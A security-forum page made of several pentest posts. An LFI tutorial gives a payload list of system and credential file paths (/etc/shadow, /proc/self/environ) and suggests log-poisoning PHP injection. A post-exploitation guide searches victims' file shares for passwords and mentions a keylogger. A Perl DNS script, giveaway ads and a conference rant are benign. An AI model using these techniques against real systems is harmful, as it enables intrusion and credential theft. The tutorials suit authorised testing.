FreeSyscalls(); ZwClose(ProcessHandle); return STATUS_SUCCESS; } Source
-
Sticky Password Premium is a password manager with features such as automated login, automatic form filling, and password generator, and it protects your data with industry-standard AES-256 encryption coupled with your master password or biometric authentication (e.g. fingerprint). Sticky Password Premium is available on Windows, Mac, Android and iOS, and you have the option (if you want) to automatically synchronize your data across all your computers, smartphones, and tablets. If you prefer not to sync data via Sticky Password’s cloud-based servers, you can utilize Sticky Password Premium’s local WiFi sync, which syncs your data over your own network and never touches the cloud. Want a longer license? Then get Sticky Password Premium with free lifetime upgrades and never worry about paying yearly fees again! Sale ends in 1 day 19 hrs 24 mins Free Sticky Password Premium (100% discount)
-
WinX DVD Copy Pro allows you to copy/backup your DVDs to DVD discs, DVD folders, or ISOs. The copies made by WinX DVD Copy Pro are 1:1 and allow for playback on your computer plus ability to reburn without loss of quality. DRM protection and region locks are bypassed by WinX DVD Copy Pro. This giveaway has no free updates or free tech support and must be installed and registered before this giveaway is over. Get WinX DVD Copy Pro with free lifetime upgrades for free updates, free tech support, and ability to install/reinstall/register after this giveaway is over. Sale ends in 1 day 19 hrs 24 mins Free WinX DVD Copy Pro (100% discount)
-
Often when conducting security assessments it is necessary to go beyond just identifying the vulnerability, reporting it and heading out for a beer. Sometimes, like when conducting a penetration test or when asked by a client to demonstrate business risk, it is necessary to gain command line line access to the machine to show the risks associated with having a web user being able to execute commands on their machine. Often this involves getting a shell by some means but in the case of Local File Inclusion (LFI) simply finding the Apache Log location folder can be enough to start running commands on the system as the Apache service account. Often I’ve wasted hours trying all sorts of combinations trying to find the correct location of the log files by looking up version numbers and identifying operating systems but being the true to the Pentesters code, sometimes it’s better to be lazy and just automate the damn thing. So what a buddy of mine and me did was to compile a list of common Apache log file locations and files that may indicate Apache log locations across different operating systems. This list is by no means comprehensive and if the developer or engineer has bothered to spend 5 minutes moving the log file locations then chances are that this list may not help you. Luckily, most people don’t bother moving logs which makes this a great list to work with. Below is an example of how to use this list to quickly discover the location of the Apache log location after you’ve located a LFI vulnerability. This tutorial will utilize Burp Suite, one of the better Web Testing suites available. If you don’t have a copy yet, go get it from Burp Suite The paid version of the software does not have the timing restrictions and is well worth getting to speed up this attack. To start, copy the contents of this list and save it somewhere you can access through Burp Suite. /Library/WebServer/Documents/index.php /Library/WebServer/Documents/index.html /apache/logs/access.log /apache/logs/error.log /etc/GeoIP.conf.default /etc/PolicyKit/PolicyKit.conf /etc/X11/xorg.conf /etc/X11/xorg.conf-vesa /etc/X11/xorg.conf-vmware /etc/X11/xorg.conf.BeforeVMwareToolsInstall /etc/X11/xorg.conf.orig /etc/adduser.conf /etc/airoscript.conf /etc/apache2/apache2.conf /etc/apache2/conf.d /etc/apache2/conf.d/charset /etc/apache2/conf.d/security /etc/apache2/envvars /etc/apache2/httpd.conf /etc/apache2/mods-available/autoindex.conf /etc/apache2/mods-available/deflate.conf /etc/apache2/mods-available/dir.conf /etc/apache2/mods-available/mem_cache.conf /etc/apache2/mods-available/mime.conf /etc/apache2/mods-available/proxy.conf /etc/apache2/mods-available/setenvif.conf /etc/apache2/mods-available/ssl.conf /etc/apache2/mods-enabled/alias.conf /etc/apache2/mods-enabled/deflate.conf /etc/apache2/mods-enabled/dir.conf /etc/apache2/mods-enabled/mime.conf /etc/apache2/mods-enabled/negotiation.conf /etc/apache2/mods-enabled/php5.conf /etc/apache2/mods-enabled/status.conf /etc/apache2/ports.conf /etc/apache2/sites-available/default /etc/apache2/sites-enabled/000-default /etc/apt/apt.conf.d /etc/apt/apt.conf.d/00trustcdrom /etc/apt/apt.conf.d/01autoremove /etc/apt/apt.conf.d/01ubuntu /etc/apt/apt.conf.d/05aptitude /etc/apt/apt.conf.d/50unattended-upgrades /etc/apt/apt.conf.d/70debconf /etc/arpalert/arpalert.conf /etc/avahi/avahi-daemon.conf /etc/bash_completion.d/debconf /etc/belocs/locale-gen.conf /etc/bluetooth/input.conf /etc/bluetooth/main.conf /etc/bluetooth/network.conf /etc/bluetooth/rfcomm.conf /etc/bonobo-activation/bonobo-activation-config.xml /etc/ca-certificates.conf /etc/ca-certificates.conf.dpkg-old /etc/casper.conf /etc/chkrootkit.conf /etc/clamav/clamd.conf /etc/clamav/freshclam.conf /etc/conky/conky.conf /etc/console-tools/config.d /etc/console-tools/config.d/splashy /etc/cups/acroread.conf /etc/cups/cupsd.conf /etc/cups/cupsd.conf.default /etc/cups/pdftops.conf /etc/cups/printers.conf /etc/cvs-cron.conf /etc/cvs-pserver.conf /etc/dbus-1/session.conf /etc/dbus-1/system.conf /etc/debconf.conf /etc/defoma/config /etc/defoma/config/x-ttcidfont-conf.conf2 /etc/deluser.conf /etc/depmod.d/ubuntu.conf /etc/dhcp3/dhclient.conf /etc/dhcp3/dhcpd.conf /etc/discover-modprobe.conf /etc/discover.conf.d /etc/discover.conf.d/00discover /etc/dns2tcpd.conf /etc/e2fsck.conf /etc/esound/esd.conf /etc/etter.conf /etc/fonts/conf.d /etc/fonts/conf.d/README /etc/foomatic/filter.conf /etc/foremost.conf /etc/freetds/freetds.conf /etc/fuse.conf /etc/gconf /etc/gconf/2 /etc/gconf/2/evoldap.conf /etc/gconf/2/path /etc/gconf/gconf.xml.defaults /etc/gconf/gconf.xml.defaults/%gconf-tree.xml /etc/gconf/gconf.xml.mandatory /etc/gconf/gconf.xml.mandatory/%gconf-tree.xml /etc/gconf/gconf.xml.system /etc/gdm/failsafeDexconf /etc/gnome-vfs-2.0/modules/default-modules.conf /etc/gnome-vfs-2.0/modules/extra-modules.conf /etc/gre.d/1.9.0.10.system.conf /etc/gre.d/1.9.0.14.system.conf /etc/gre.d/1.9.0.15.system.conf /etc/group /etc/gtk-2.0/im-multipress.conf /etc/hdparm.conf /etc/host.conf /etc/htdig/htdig.conf /etc/httpd/conf/httpd.conf /etc/httpd/httpd.conf /etc/httpd/logs/acces.log /etc/httpd/logs/acces_log /etc/httpd/logs/access.log /etc/httpd/logs/access_log /etc/httpd/logs/error.log /etc/httpd/logs/error_log /etc/httpd/mod_php.conf /etc/inetd.conf /etc/initramfs-tools/conf.d /etc/irssi.conf /etc/java-6-sun/fontconfig.properties /etc/kbd/config /etc/kernel-img.conf /etc/kernel-pkg.conf /etc/ld.so.conf /etc/ldap/ldap.conf /etc/logrotate.conf /etc/ltrace.conf /etc/mail/sendmail.conf /etc/manpath.config /etc/menu-methods/menu.config /etc/miredo-server.conf /etc/miredo.conf /etc/miredo/miredo-server.conf /etc/miredo/miredo.conf /etc/modprobe.d/vmware-tools.conf /etc/mono/1.0/machine.config /etc/mono/2.0/machine.config /etc/mono/2.0/web.config /etc/mono/config /etc/mtools.conf /etc/mysql/conf.d /etc/mysql/conf.d/old_passwords.cnf /etc/nsswitch.conf /etc/oinkmaster.conf /etc/openvpn/update-resolv-conf /etc/pam.conf /etc/passwd /etc/pear/pear.conf /etc/php.ini /etc/php/php.ini /etc/php5/apache2/conf.d /etc/php5/apache2/php.ini /etc/php5/php.ini /etc/pm/config.d /etc/pm/config.d/00sleep_module /etc/postgresql-common/autovacuum.conf /etc/prelude/default/global.conf /etc/prelude/default/idmef-client.conf /etc/prelude/default/tls.conf /etc/privoxy/config /etc/proxychains.conf /etc/pulse/client.conf /etc/python/debian_config /etc/reader.conf /etc/reader.conf.d /etc/reader.conf.d/0comments /etc/reader.conf.d/libccidtwin /etc/reader.conf.old /etc/remastersys.conf /etc/resolv.conf /etc/resolvconf /etc/resolvconf/update-libc.d /etc/resolvconf/update-libc.d/sendmail /etc/rinetd.conf /etc/samba/dhcp.conf /etc/samba/smb.conf /etc/scrollkeeper.conf /etc/security/access.conf /etc/security/group.conf /etc/security/limits.conf /etc/security/namespace.conf /etc/security/opasswd /etc/security/pam_env.conf /etc/security/sepermit.conf /etc/security/time.conf /etc/sensors.conf /etc/shadow /etc/skel/.config /etc/skel/.config/Trolltech.conf /etc/skel/.config/codef00.com /etc/skel/.config/menus /etc/skel/.config/menus/applications-kmenuedit.menu /etc/skel/.config/user-dirs.dirs /etc/skel/.config/user-dirs.locale /etc/skel/.kde3/share/apps/kconf_update /etc/skel/.kde3/share/apps/kconf_update/log/update.log /etc/skel/.kde3/share/share/apps/kconf_update /etc/skel/.kde3/share/share/apps/kconf_update/log /etc/skel/.kde3/share/share/apps/kconf_update/log/update.log /etc/smi.conf /etc/snmp/snmpd.conf /etc/snort/reference.config /etc/snort/rules/emerging.conf /etc/snort/rules/open-test.conf /etc/snort/snort-mysql.conf /etc/snort/snort.conf /etc/snort/threshold.conf /etc/splashy/config.xml /etc/ssh/sshd_config /etc/stunnel/stunnel.conf /etc/subversion/config /etc/sysctl.conf /etc/sysctl.d/10-console-messages.conf /etc/sysctl.d/10-network-security.conf /etc/sysctl.d/10-process-security.conf /etc/sysctl.d/wine.sysctl.conf /etc/syslog.conf /etc/tinyproxy/tinyproxy.conf /etc/tor/tor-tsocks.conf /etc/tpvmlp.conf /etc/tsocks.conf /etc/ucf.conf /etc/udev/udev.conf /etc/ufw/sysctl.conf /etc/ufw/ufw.conf /etc/uniconf.conf /etc/unicornscan/modules.conf /etc/unicornscan/payloads.conf /etc/unicornscan/unicorn.conf /etc/updatedb.conf /etc/updatedb.conf.BeforeVMwareToolsInstall /etc/vmware-tools/config /etc/vmware-tools/tpvmlp.conf /etc/vmware-tools/vmware-tools-libraries.conf /etc/w3m/config /etc/wicd/dhclient.conf.template.default /etc/wicd/manager-settings.conf /etc/wicd/wired-settings.conf /etc/wicd/wireless-settings.conf /etc/xdg/user-dirs.conf /logs/access.log /logs/error.log /private/etc/apache2/extra/httpd-default.conf /private/etc/apache2/extra/httpd-userdir.conf /private/etc/apache2/extra/httpd-vhosts.conf /private/etc/apache2/mime.types /private/var/log/apache2/access_log /private/var/log/apache2/error_log /proc/cpuinfo /proc/meminfo /proc/self/cmdline /proc/self/environ /proc/self/mounts /proc/self/stat /proc/self/status /proc/version /share/snmp/snmpd.conf /srv/www/htdocs/index.html /usr/bin/php/php.ini /usr/bin/php5/bin/php.ini /usr/local/apache/logs/access.log /usr/local/apache/logs/access_log /usr/local/apache/logs/error.log /usr/local/apache/logs/error_log /usr/local/apache2/conf/extra/httpd-ssl.conf /usr/local/apache2/conf/httpd.conf /usr/local/apache2/logs/access_log /usr/local/apache2/logs/error_log /usr/local/etc/apache2/httpd.conf /usr/local/etc/apache22/httpd.conf /usr/local/www/apache22/data/index.html /usr/pkg/etc/httpd/httpd.conf /var/log/access.log /var/log/access_log /var/log/apache/access.log /var/log/apache/access_log /var/log/apache/error.log /var/log/apache/error_log /var/log/apache2/access.log /var/log/apache2/access_log /var/log/apache2/error.log /var/log/apache2/error_log /var/log/error.log /var/log/error_log /var/log/httpd-access.log /var/log/httpd-error.log /var/log/httpd/access.log /var/log/httpd/access_log /var/log/httpd/error.log /var/log/httpd/error_log /var/www/conf/httpd.conf /var/www/logs/access.log /var/www/logs/access_log /var/www/logs/error.log /var/www/logs/error_log /wwwroot/php/php.ini Once you have saved this list somewhere, open up Burp Suite, locate the LFI injection point and send the request to Burp Intruder. In the Burp Intruder window, select the “Positions” tab and mark the position of your LFI injection point. Change the attack type to “Sniper”. Then under the “Payloads” tab, choose the Apache logs list or paste the contents of the list into the payload window. Start the attack and pay attention to the length column. Typically Apache log folders are going to be large and should return a large length field. When you find a length field that is significantly larger than the other requests, look at the response to see if the contents returned match what an Apache log file would look like. If it does look like a log file and you can see some of your previous traffic displayed, you have successfully found the Apache log location and can now use this to start injecting your PHP code to run requests on the target machine. Footnote: this log list is not comprehensive and I will continue to add to it as I find more more locations as well as some windows folder locations. Source
-
Using perl to grab IP addresses of multiple hostnames
Aerosol posted a topic in Tutoriale in engleza
Recently while conducting a vulnerability assessment for a rather large customer I was given a list of hostnames from around 20 domains culminating in a list of over 5000 targets that needed to go through the motions. Due to scale of the testing I needed to run the scans from several cloud nodes simultaneously to speed up the scanning. The other thing I needed to do was to extract all the IP addresses from the hostnames so as not to scan boxes multiple times when performing Port Scans for instance. I had been playing with Perl for literally a couple of hours and decided to give writing my first Perl script a go in order to grab all the IP addresses from the list of hosts which I could then Unique and Sort to get the final list of target IP’s. I initially played with the idea of running ping commands or nslookups and then regex’ing the IP’s from there but I discovered a fantastic method called “gethostbyname” in Perl. After some trial and error I ended up with this little gem that literally shaved days off this vulnerability assessment (5000+ hostnames ended up being less than 1000 IP addresses). #!/usr/bin/perl use Socket; # Print usage when no hosts file is specified if ($ARGV[0] eq '') { print "n Usage: ".$0." <hosts_file>nn"; print " e.g: ".$0." hosts.txtnn"; } # Open file containing list of Hostnames open(FILE, $ARGV[0]); @Hosts) { chomp($hostname); if($hostname) { $ip = gethostbyname($hostname); if($ip) { printf "%sn" , $hostname.":".inet_ntoa($ip); undef $ip; } else { # Print 0.0.0.0 for unresolved Hostnames printf "%sn" , $hostname.":0.0.0.0"; undef $ip; } } } It works by taking each hostname and running the “gethostbyname” method on it to print out the original hostname and IP address separated by a “:” for easy regex or to use delimited import in Excel. Feel free to change the delimiter if you so wish. The other function I added was to set an IP address of “0.0.0.0” whenever a hostname could not be resolved. Here’s what it looks like in action. If you want to import the output into another program you can just append “ > output.csv” Credit's to: norsec0de References: Perl gethostbyname Function Perl printf Function PERL -- Predefined Names Socket - perldoc.perl.org Source -
Often while conducting an internal pentest you may gain access to a user machine through some vulnerability or more commonly via social engineering. Let’s say that you pop a shell, unprivileged, and incognito only finds unprivileged domain tokens. You could move onto another target or you can try some post exploitation reconnaissance. A commonly overlooked source of sensitive information is documents that are stored on the company servers as well as staff who think they know enough to start sharing folders with their peers and end up sharing the root of ‘C’. These can be a fantastic source of juicy info if you know how to index and then search through them effectively. Firstly we need to see what shares your victim has access to. Nmap’s NSE will only get you so far but fortunately Microsoft has their own tool to do this for us, and best of all, it’s signed by Microsoft so using this is seldom an issue. Grab ShareEnum from Sysinternals. It’s a self-contained executable that doesn’t require any installation. Wait for the vic to take lunch or head home, connect to his desktop and run the tool. If you don’t have his password yet, use the Metasploit Lockout Credential Keylogger If you’re lucky enough, ShareEnum will get you all the shares for the entire domain otherwise just use the local subnets to search for the data stores. Make a note of the mapped drives and take note of the UNC paths; this will come in handy later. Once you’ve exported the data into a text file, use your text editor to get the share names and begin creating a mount script to mount them. Ensure that you mount them all under the same subfolder, e.g. /mnt or /media, so we can configure the indexer to only index these mounts and not waste time indexing your own drive. Run the script to create all the mount points. Once you’ve created a mount point for each of the shares, create a script to mount the shares and run it. Now that the shares are mounted, the indexing tool needs to be installed and configured. A decent indexing tool that I would recommend is called Recoll. Recoll may already be installed in Kali. The benefit to using Recoll over some alternatives is that it can index the usual text and spreadsheet documents as well as inside ZIP file formats including the newer .DOCX, .XLSX and .PPTX. It also parses MIME, XML and PDF very well. Installing recall on Kali or Ubuntu is pretty simple. sudo apt-get install recoll Once you have downloaded the tool, you will need to edit the config file which by default is stored at ~/.recoll/recoll.conf I found these settings to be the best time/finding trade-off. topdirs = path where you mounted the shares idxflushmb = database store size before flush skippedNames = files & extensions you don’t want indexed (filenames will still be shown, not contents) indexedmimetypes = the file types that you want indexed Once the config file is configured, pipe in the list of files you want indexed. Use a command such as find /mnt –type f –print | recollindex –i Once the files have been indexed, open up the Recoll GUI and start searching for keywords that will help get you some additional passwords. A list of keywords that worked well credit card ctrl alt del domain\ id ident key log in log on login logon net use net user pass passphrase passwd password pin phrase pw pword secret ssid un uname user username wireless Here are a couple of screenshots from just a few shares that were available on this local subnet. The keyword list is by no means comprehensive, however it should provide a solid foundation for a way of thinking about sensitive documents that are shared with everyone. As pentesters, we can use this information to increase our reach and impact on the client network. Knowing items such as the local administrator passwords and using them with PSEXEC can compromise the majority of machines on the network and the chances of now finding a domain administrator token on one of those boxes is going to increase. Even the best training and policies are not going to stop certain system administrators from reusing passwords, so knowing some of these passwords can usually yield some interesting findings. Another high risk finding is the database credentials, which almost never get changed and often allow system commands to be executed. Knowing how to find the sensitive information is a great skill to have in your arsenal and I hope this short post inspires you to become a better tester. The days of vulnerability scanners getting you root or system are numbered and exploiting the human weaknesses is becoming a necessity in modern networks. Credit's to: norsec0de Source
-
Through a series of strange decisions I found myself on the way to Las Vegas over the same week of Black Hat, however, without a ticket to the Black Hat Briefings. This didn’t phase me in the slightest as I attended Black Hat last year and to be quite frank, I wasn’t impressed. This did raise an interesting question though: if I’m not wasting my time at Black Hat, what could I be doing? This question was easily answered as just about every person I look up to in the InfoSec industry was heading to one place…BSides LV at the Tuscany Hotel. I’d never attended a BSides conference before and had no idea what to expect. How much are the tickets? How long are the queues for the talks? How much is the food and drinks? It turns out the answer is pretty much nothing to all of the above. What I want to take away from an InfoSec conference is to have learned something, meet some interesting people, help other people who may have questions and generally have a good time doing it. Walking into BSides on Tuesday morning, I was warmly greeted and given a badge and a smile. That’s it. No spammy email address, no dollars, just a badge. Walking around BSides I saw that there is an abundance of tracks, workshops and a large chill out area with free drinks (as in beer), raffles and competitions. I spent the large majority of the con on the red team for the “Joes vs Pros CTF” competition, which gives defensive security and network engineers a chance to feel the heat of a red team bashing the hell out of their network. Uptime is important for points and there is a gold team sending the blue team’s help desk requests, which need to be actioned whilst frantically trying to secure their network and kill our shells. After competition closed on Tuesday, I had a chat with the winning blue team who did a really good job of locking us out whilst maintaining uptime on critical services. These guys got pummelled last year and came away with new skills and ideas that they implemented this year. A few of the members shared appreciation that they had learned more from competing in Joes vs Pros for a single day than they had from attending years of college and certifications. They mentioned that dealing with an active attack where they are forced to keep vulnerable software up and running taught them to look farther than just simple patching exercises. The creativity that they came up with was astounding – from setting up spoofed sites that had no back-end connected to it, to serving us honeypots and ban-hammering us on their firewalls. The following day, the blues got their own red team members and needed to engage their opposing blue team. With a red team member assisting them with exploitation of the target machines, which were compromised the day before, the blues got to experience the attack from the red team’s point of view and learned how targets are enumerated as well as what weaknesses are exploited in the discovered applications. This information was then used to modify their own applications to make exploitation by the opposing team much more difficult or even impossible. What I took away from this experience is that these blue team members are getting valuable training, whilst having a good time, essentially for the price of getting to Las Vegas. BSides volunteers make the con what it is and sponsor donations go towards the cost of setting up the competitions or providing prizes and drinks. I learned a lot about BSides over my two days there. I attended some good talks, snuck into a workshop where attendees were taught to build a RFID reader that works from 4 feet away with only $35 of hardware, met some awesome people and had a great time doing it all. All this made me really REALLY angry. Even though there was good work being done and great knowledge being shared at the Tuscany Hotel, several blocks away the worlds largest “security” conference was being held and doing a fine job at advancing just about everything that is wrong with this industry. Since starting work as a Penetration Tester, I’ve noticed one very big problem within the Information Security realm. By far, the biggest problem that currently exists in Infosec is that people still believe that they can “buy” security. Right out of the gate I will tell you “this is bullshit!” You cannot buy anything from any vendor that will stop your company getting compromised. Buzzwords like Next-Gen, Multi-Tiered, Smart and APT are just marketing turd-speak for devices that basically do nothing. And Black Hat is the single biggest culprit of promoting the use of these “magic bullets.” After you’ve cleared away all the fluff around Black Hat, what you’re left with is a room full of “magic bullets” being shown off by booth babes and a bunch of “researchers” giving presentations to massive audiences about why they should buy them. To make matters worse, the amount of money spent on these devices each year is astronomical – yet more and more companies are getting compromised every day, now more than ever before. I borrowed a ticket to visit the vendor-fest on Thursday for a couple of hours to see what, if anything, was better about this year than last. After all, 8000 people can’t be wrong, right? After looking at the briefings and seeing that there was hardly anything of value worth watching, I wandered over to the the vendor area. I ended up speaking to a golf shirt about his “magical DLP machine” which uses sophisticated algorithms and cutting edge buzzwords to hunt down people leaking trade secrets and PII. I asked him if the machine would catch someone exfiltrating credit card numbers and the response was a resounding “Oh definitely!” When asked what the machine would do if someone base64’d this same information first, he ran off to find someone with a brain. I then spoke to one of the “magical DLP machine” developers who told me that the CPU cycles taken to decrypt the traffic would be too much for such high throughput and base64 traffic would not be decoded before checking the contents. Then I see the big one…a box that can detect 0-day malware. Oh wow. Problem solved. These guys have cracked the code. They have made a device smarter than all the Russians, Ukrainians and Belize malware-devs combined. Or have they? I challenge you. Deploy that thing in a public network and offer $1 million dollars to the person who deploys malware on the same network which the “magical DLP machine” cannot detect. Vendor after vendor pitched me their next-gen, cutting edge, complex algorithm, layer-7 flashy box and each and every time, I could outwit their machines in under 5 minutes. Again, if you didn’t read it earlier…”YOU CAN’T BUY SECURITY!” Walking into Black Hat and throwing money at everything with a flashing light and a web console is not going to make you or your company more secure. Even if you bought each and every single device and had them professionally installed with maximum protections enabled, any pentester worth their salt could still compromise your network with a smile or a cleverly worded email. And that is the main reason why all these products do not work. Chris Nickerson put it best. “You say your device can do this? Prove it! You say your company is secure? Prove it! You say the bad guys can’t get your customer data? Prove it!” If for one second you actually believe the hype regurgitated out by these pretty boys with their sunglasses and golf shirts who market some box that protects against everything, then you have already lost. If it could genuinely solve all your information security problems as soon as you plug it in, they could genuinely sell it for a bazillion dollars and you would gladly buy it. But the reality is that you’re actually buying nothing. You’re buying a marketing pitch. Maybe you’re buying a few nights of peaceful sleep. Maybe you’re buying a bigger budget next year. Maybe you’re buying an alliance with some vendor. But you are not buying security and the vendors cannot prove that their solutions do anything to stop a determined attacker. All they can do is show you that in a perfect simulated test environment, it does something. Would it work in your environment? Maybe. Will it make you more secure? Probably not. Does the machine do all the things it says on the tin? Doubtful. I’m not saying that there is no value in Black Hat. I’m saying there is no value in purchasing a $1500 ticket to attend a convention where you are encouraged to purchase more things. If you are in the security industry and attend Black Hat to network with clients, great. You could probably do that for free at one of the million parties held after hours. Just avoid all the golf-shirt, booth-boys running around with their sunglasses on at night calling themselves hackers because they work for a company whose product can detect SQLi vulnerabilities. “Shut up, you’re a sales monkey!” There are also some good talks at the briefings. Black Hat is not without any interesting material but from an attacker’s point of view, I find the content of Black Hat weak and lacking in this area compared to BSides. If you are the principal or manager of a pentest team, please, don’t send your testers to Black Hat, allow them to attend BSides instead where they can actually learn, meet, teach and have fun. P.S. All of the above is my opinion, which I’m entitled to. However, if you managed to read this far and wish to bitch at me for saying what I did, use the comment feature below and I’ll make every effort to respond if required. Source